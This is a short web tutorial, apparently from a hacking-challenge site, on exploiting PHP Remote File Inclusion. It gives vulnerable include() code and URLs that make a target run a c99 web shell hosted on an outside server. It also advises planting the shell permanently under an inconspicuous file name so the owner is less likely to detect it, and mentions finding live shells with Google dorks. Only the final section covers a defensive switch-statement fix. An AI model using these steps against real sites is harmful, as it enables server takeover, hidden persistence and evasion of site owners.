Remote File Inclusion
Remote File Inclusion (RFI) is a method used to gain full access to a website or server. The exploit relies on the PHP include() function which can be unsecure if not sanitized. Sites using this function will usually have links similar to:
index.php?page=something
If this isn't sanitized properly, the script doesn't check where the file is coming from and so an inclusion from an external location containing PHP code will be accepted and run natively on the server. This means that a text file containing a PHP script can be hosted on another server but run on the site being targeted.
This is where web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands (such as SQL). The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site and/or server.
There are two types of PHP code vulnerable to this and each requires a slightly different method. You can't really know which is being used, so you simply try both methods. The vulnerable PHP code could look similar to the following:
<?php
$page = $_GET['page'];
include($page);
?>
<?php
$page = $_GET['page'];
include($page . ".php");
?>
How to do this
If you have found a vulnerable site, this is how to exploit it. Firstly you need to upload your shell as a text file or find one already available online. For this I will use www.site.com/c99.txt. Then all you do is simply put this link at the end of you vulnerable site. I will use www.example.com. So the final strings to run the web shell are:
Example 1:
www.example.com/index.php?file=http://www.site.com/c99.txt
Example 2:
www.example.com/index.php?file=http://www.site.com/c99.txt?
(the question mark should be at the end)
This will execute in the PHP like so:
Example 1:
<?php include('http://www.site.com/c99.txt'); ?>
Example 2:
<?php include('http://www.site.com/c99.txt?.php'); ?>
Have access?
If you have a web shell on the site, but want to make sure you still have access if the owner changes the php script you could upload your shell to their site. Save the text file and rename it from .txt to .php then simply upload it using the shell you already have on the site (www.site.com/index.php?file=http://www.site.com/c99.txt?)
But be sure to name it something that is less obvious than c99.php so that it is less detectable. Look around files for naming conventions.
What a shell looks like
A c99.txt shell example can be found here. If you are using a c99 shell and are successful you will be displayed with a page that has:
At the top: "Safe-mode: OFF (not secure)"
Below "upload" and "make file" it says: "[ ok ]"
This means that you would have complete control over the site. A few google dorks can easily find you a real shell as this is currently a common attack method.
Protect yourself
Want to still use the index.php?file= format but make sure your site isn't vulnerable to RFI? No problem, just use the "switch" statement that defines the pages before hand. The code is shown below:
<?php
$page = $_GET["page"];
switch($page) {
case "page1":
include("page1.php");
break;
case "page2":
include("page2.php");
break;
default: // default action if nothing is passed through
include("home.php");
break;
}
?>
That concludes this tutorial. Be sure to look out for site challenges with a similar URL format.